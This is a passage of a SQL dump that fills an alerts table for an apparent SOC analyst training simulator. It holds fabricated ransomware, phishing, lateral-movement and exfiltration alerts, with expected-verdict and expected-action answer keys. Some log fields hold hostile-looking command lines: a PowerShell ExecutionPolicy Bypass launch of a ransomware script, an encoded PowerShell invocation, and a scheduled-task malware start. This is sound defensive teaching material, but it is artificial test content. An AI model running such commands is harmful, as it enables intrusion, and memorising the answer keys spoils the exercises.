4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(961, 'Malicious Script Execution Detected', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following successful access, a malicious script was executed to deploy the ransomware, initiating the attack on the city\'s infrastructure. The script was executed on a compromised endpoint.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:13Z\",\"event_id\":\"EDR-456789\",\"hostname\":\"city-infra-server01\",\"username\":\"compromised_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\deploy_ransomware.ps1\",\"file_hash\":\"3f2e5f7b9e2a3c4d5f6a7b8c9d0e1f2g3h4i5j6k\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"10.0.0.25\",\"file_name\":\"deploy_ransomware.ps1\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known ransomware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2e5f7b9e2a3c4d5f6a7b8c9d0e1f2g3h4i5j6k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deploy_ransomware.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Filename used in multiple ransomware 
attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(962, 'Unauthorized Account Creation Observed', 'high', 'User Account Management Logs', 'New accounts with administrative privileges were created to ensure the attacker retains control, even if the initial access points are discovered.', 'Persistence', 'T1136.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"account_name\":\"admin_user\",\"account_domain\":\"CITY_NETWORK\",\"logon_type\":\"3\",\"source_ip\":\"203.0.113.45\",\"target_sid\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"target_username\":\"new_admin_account\",\"privilege_level\":\"Administrator\",\"internal_ip\":\"10.0.0.15\",\"associated_files\":[{\"filename\":\"malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}]}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"new_admin_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unexpected administrative account creation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to potentially harmful scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(963, 'Anomalous Lateral Movement Activity', 'high', 'Network Traffic Analysis', 'The attacker used compromised credentials to move across various systems, spreading the ransomware deeper into the city\'s network infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.2.15\",\"external_attack_ip\":\"203.0.113.25\",\"username\":\"jdoe\",\"compromised_account\":true,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"ransomware_payload.exe\",\"protocol\":\"SMB\",\"action\":\"Login successful\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Database\",\"verdict\":\"malicious\",\"details\":\"File known to be used in ransomware attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(964, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) Solutions', 'An unauthorized attempt to exfiltrate sensitive data was detected, potentially for ransom leverage. The attacker used an external IP to upload confidential files to a remote server.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"file_name\":\"financial_report_q3_2023.docx\",\"file_hash\":\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\",\"action\":\"attempted_upload\",\"destination_url\":\"http://malicious-server.org/upload\",\"protocol\":\"HTTP\",\"alert_level\":\"high\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial data.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"suspicious\",\"details\":\"Hash not seen in common repositories, linked to exfiltration attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" 
| head 100\"}}', 0),
(965, 'Initial Access via Phishing Campaign', 'high', 'Email Security Gateway Logs', 'Evil Corp initiated their attack with a targeted phishing campaign, leveraging social engineering to trick Garmin employees into opening malicious attachments. This step marks the beginning of the attack, setting the stage for further compromise.', 'Social Engineering', 'T1566', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.25\",\"email_subject\":\"Urgent: Action Required\",\"email_sender\":\"noreply@garmin-support.com\",\"recipient\":\"john.doe@garmin.com\",\"attachment_name\":\"Invoice_4823.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Attachment Opened\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malicious_indicator\":true}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of victim\'s workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@garmin-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sender email used in spoofed phishing attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document 
files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.652Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(966, 'WastedLocker Payload Execution', 'critical', 'Endpoint Detection and Response (EDR) Systems', 'Following a successful phishing attack, the WastedLocker ransomware was deployed on Garmin\'s network. This execution phase is critical as it disrupts operations, causing widespread service outages.', 'Malware Deployment', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"malware_execution\",\"host_ip\":\"10.0.25.13\",\"attacker_ip\":\"185.243.115.12\",\"username\":\"jdoe\",\"filename\":\"wastedlocker.exe\",\"file_hash\":\"3fa7b6810b1c8cb4f2b4d5a9e7e6c8f9\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\wastedlocker.exe\",\"process_id\":4567,\"parent_process_id\":1234,\"alert_id\":\"edr-2023-1001-002\",\"detection_method\":\"behavioral_analysis\"}', '2026-01-17 03:38:37', '2026-02-16 17:53:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.25.13\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.243.115.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with WastedLocker\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wastedlocker.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Executable associated with WastedLocker ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa7b6810b1c8cb4f2b4d5a9e7e6c8f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"malicious\",\"details\":\"Hash matches known WastedLocker ransomware 
variant\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Compromised user\'s account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(967, 'Persistence through Scheduled Tasks', 'high', 'System Logs and Scheduled Tasks', 'Evil Corp utilized scheduled tasks to maintain persistence within Garmin\'s network. This mechanism enabled them to re-establish connections for ongoing malicious activities without detection.', 'Persistence Mechanism', 'T1053', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4698\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateTasks\\\\CriticalUpdate\",\"author\":\"SYSTEM\",\"trigger\":\"Daily\",\"action\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\malware\\\\evil_task.exe\",\"target_ip\":\"192.168.45.8\",\"attacker_ip\":\"45.76.123.55\",\"malware_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"username\":\"admin_garmin\",\"status\":\"Scheduled\"}', '2026-01-17 03:38:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.123.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Evil Corp operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash of the malware used in the persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evil_task.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_security\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used in scheduled 
